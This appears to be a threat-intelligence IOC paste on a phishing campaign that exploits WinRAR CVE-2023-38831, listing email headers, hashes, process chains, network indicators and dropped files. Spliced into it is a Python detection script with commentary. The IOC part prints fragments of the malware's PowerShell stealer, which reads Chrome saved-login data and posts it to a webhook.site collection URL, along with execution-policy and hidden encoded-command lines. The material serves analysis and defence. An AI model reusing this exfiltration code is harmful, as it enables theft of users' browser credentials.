- #IOC #OptiData #VR #RAR #202338831 #CMD #Powershell
- https://pastebin.com/APaRNDHd
- previous_contact:
- n/a
- FAQ:
- https://isc.sans.edu/diary/Analysis+of+RAR+Exploit+Files+CVE202338831/30164/
- attack_vector
- --------------
- email attach .RAR (exploit) > .xlsx .cmd > a.ps1 > powershell > exfil
- # # # # # # # #
- email_headers
- # # # # # # # #
- Return-Path: <management@abcosteel.com>
- Received: from server.abcosteel.com (server.abcosteel.com [108.175.163.195])
- Received: from [185.195.19.200] (port=44932 helo=[127.0.1.1]) by server.abcosteel.com with esmtpsa (TLS1.2) tls TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 (Exim 4.93)
- From: cyber_alerts <management@abcosteel.com>
- Subject: Нові індикатори кіберзагроз
- Message-Id: <20230830131505.37UDF5QT031908@abcosteel.com>
- Date: Wed, 30 Aug 2023 13:15:05 +0300
- # # # # # # # #
- files
- # # # # # # # #
- SHA-256 f5b5148acf4bc340b316f527c4a378f9ba51d06abe3062dcbc62bcd9954d86c9
- File name IOC_30_08.rar [ WinRAR CVE-2023-38831 ]
- File size 13.71 KB (14044 bytes)
- SHA-256 ce406bd003cbb998988a51b75b2c55b45a0e818924f6adaa783d9077375db1dc
- File name IOC_30_08.xlsx .cmd
- File size 23.79 KB (24363 bytes)
- SHA-256 363039a76125c64bf01a6694f8a3b806a832df68b442a0ce4ad76cf565678648
- File name a.ps1
- File size 18.96 KB (19418 bytes)
- # # # # # # # #
- activity
- # # # # # # # #
- PL_SCR email_attach
- C2 http://webhook.site/e6c23321-fea1-4aec-ab1a-cc5e9b93b8c6
- netwrk
- --------------
- 46.4.105{ .116 webhook{ .site 80 HTTP POST /e6c23321-fea1-4aec-ab1a-cc5e9b93b8c6 HTTP/1.1 Mozilla/5.0 (Windows NT; Windows NT 6.1; uk-UA) WindowsPowerShell/5.1.14409.1005
- 46.4.105{ .116 webhook{ .site 80 HTTP POST /e6c23321-fea1-4aec-ab1a-cc5e9b93b8c6 HTTP/1.1 Mozilla/5.0 (Windows NT; Windows NT 6.1; uk-UA) WindowsPowerShell/5.1.14409.1005
- comp
- --------------
- powershell.exe 46.4.105[.]116 80
- proc
- --------------
- "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\operator\Desktop\IOC_30_08.rar"
- C:\Windows\system32\cmd.exe /c ""C:\tmp\Rar$DIa948.23332\IOC_30_08.xlsx .cmd" "
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-ExecutionPolicy Unrestricted -scope CurrentUser; .\a.ps1
- "C:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE" /e
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe del .\a.ps1
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden -encodedCommand "QQBkAGQALQBUAHkAc
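The process chain above (WinRAR spawning cmd.exe on a "name.xlsx .cmd" file out of a Rar$ temp folder, then PowerShell with the execution policy lowered and a hidden encoded command) is what a detection engineer would key on. The following is an added example, not code from the paste: it replays constructed process-creation events modelled on the "proc" section (PIDs, the ProcEvent field names and the rule names are assumptions) through three small rules, and decodes the visible prefix of the -encodedCommand payload to show it is UTF-16LE PowerShell.

```python
import base64
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """Minimal process-creation record (field names are an assumption)."""
    pid: int
    ppid: int
    image: str
    cmdline: str


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed sample events: command lines copied from the paste's "proc" list,
# PIDs/PPIDs invented, plus one benign Excel launch as a control.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Program Files\WinRAR\WinRAR.exe",
              r'"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\operator\Desktop\IOC_30_08.rar"'),
    ProcEvent(101, 100, r"C:\Windows\system32\cmd.exe",
              r'C:\Windows\system32\cmd.exe /c ""C:\tmp\Rar$DIa948.23332\IOC_30_08.xlsx .cmd" "'),
    ProcEvent(102, 101, PS,
              PS + r" Set-ExecutionPolicy Unrestricted -scope CurrentUser; .\a.ps1"),
    ProcEvent(103, 101, r"C:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE",
              r'"C:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE" /e'),
    ProcEvent(104, 102, PS,
              PS + r' -windowstyle hidden -encodedCommand "QQBkAGQALQBUAHkAc'),
    ProcEvent(200, 1, r"C:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE",
              r'"C:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE" "C:\Users\operator\Desktop\budget.xlsx"'),
]

# Document-looking name, whitespace, then a script/executable extension: the
# CVE-2023-38831 archive trick depends on that space before the real extension.
SPOOFED_EXT = re.compile(r"\.(xlsx|docx|pdf|jpg|png|txt)\s+\.(cmd|bat|exe|vbs|js|ps1)\b", re.I)
# WinRAR's per-archive extraction folder in %temp%.
RAR_TEMP = re.compile(r"\\Rar\$\w+\.\d+\\", re.I)
EXEC_POLICY = re.compile(r"set-executionpolicy\s+(unrestricted|bypass)", re.I)
HIDDEN_WINDOW = re.compile(r"-w(indowstyle)?\s+hidden", re.I)
ENCODED_CMD = re.compile(r'-(enc|encodedcommand|ec|e)\s+"?([A-Za-z0-9+/=]+)', re.I)


def decode_encoded_command_prefix(b64: str) -> str:
    """Decode the complete 4-character groups of a (possibly truncated)
    -encodedCommand value; PowerShell encodes the script as UTF-16LE."""
    usable = b64[: len(b64) - len(b64) % 4]
    raw = base64.b64decode(usable)
    return raw[: len(raw) - len(raw) % 2].decode("utf-16-le", errors="replace")


def _is(ev: ProcEvent, name: str) -> bool:
    return ev.image.lower().endswith(name)


def detect(events):
    """Return (rule_name, pid, detail) hits for the three behaviours in the chain."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for ev in events:
        parent = by_pid.get(ev.ppid)
        cl = ev.cmdline
        # Rule 1: cmd.exe launched by WinRAR (or from a Rar$ temp dir) on a spoofed-extension file.
        if _is(ev, "cmd.exe") and SPOOFED_EXT.search(cl) and (
            (parent is not None and _is(parent, "winrar.exe")) or RAR_TEMP.search(cl)
        ):
            hits.append(("winrar_spoofed_extension_exec", ev.pid, SPOOFED_EXT.search(cl).group(0)))
        # Rule 2: execution policy lowered on the command line before running a script.
        if _is(ev, "powershell.exe") and EXEC_POLICY.search(cl):
            hits.append(("powershell_execution_policy_override", ev.pid, EXEC_POLICY.search(cl).group(0)))
        # Rule 3: hidden window plus an encoded command; surface the decoded prefix for triage.
        if _is(ev, "powershell.exe") and HIDDEN_WINDOW.search(cl):
            m = ENCODED_CMD.search(cl)
            if m:
                hits.append(("powershell_hidden_encoded", ev.pid, decode_encoded_command_prefix(m.group(2))))
    return hits


if __name__ == "__main__":
    for rule, pid, detail in detect(SAMPLE_EVENTS):
        print(f"{rule}: pid={pid} detail={detail!r}")
```

The benign Excel launch (pid 200) produces no hit; rule 1 deliberately requires both the spoofed-extension pattern and WinRAR lineage or the Rar$ temp path, so an ordinary batch file run by a user does not fire it.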
- persist
- --------------
- n/a
- drop
- --------------
- %temp%\Rar$DIa948.23332\IOC_30_08.xlsx .cmd
- %temp%\example.xlsx
- C:\Users\%name%\Desktop\a.ps1
- C:\Users\%name%\AppData\Roaming\Microsoft\Office\Последние файлы\example.xlsx.LNK
- # # # # # # # #
- additional info
- # # # # # # # #
- Add-Type -AssemblyName System.Text.Encoding; Add-Type -AssemblyName System.Security; $hook="http://webhook.site/e6c23321-fea1-4aec-ab1a-cc5e9b93b8c6"; $dataPath="$($env:LOCALAPPDATA)\\Google\\Chrome\\User Data\\Default\\Login Data"; $localStatePath = "$($env:LOCALAPPDATA)\\Google\\Chrome\\User Data\\Local State"; ....
- :Unprotect($master_key_encoded[5..$master_key_encoded.length], $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser); $loginDataContent = [convert]::ToBase64String((Get-Content -path $dataPath -Encoding byte)); $postParams = @{k
- # # # # # # # #
- VT & Intezer
- # # # # # # # #
- https://www.virustotal.com/gui/file/f5b5148acf4bc340b316f527c4a378f9ba51d06abe3062dcbc62bcd9954d86c9/details
- https://www.virustotal.com/gui/file/ce406bd003cbb998988a51b75b2c55b45a0e818924f6adaa783d9077375db1dc/details
- https://analyze.intezer.com/analyses/a3975e5f-16b9-4942-b68d-bbb12fde9003/genetic-analysis
- https://www.virustotal.com/gui/file/363039a76125c64bf01a6694f8a3b806a832df68b442a0ce4ad76cf565678648/details
- VR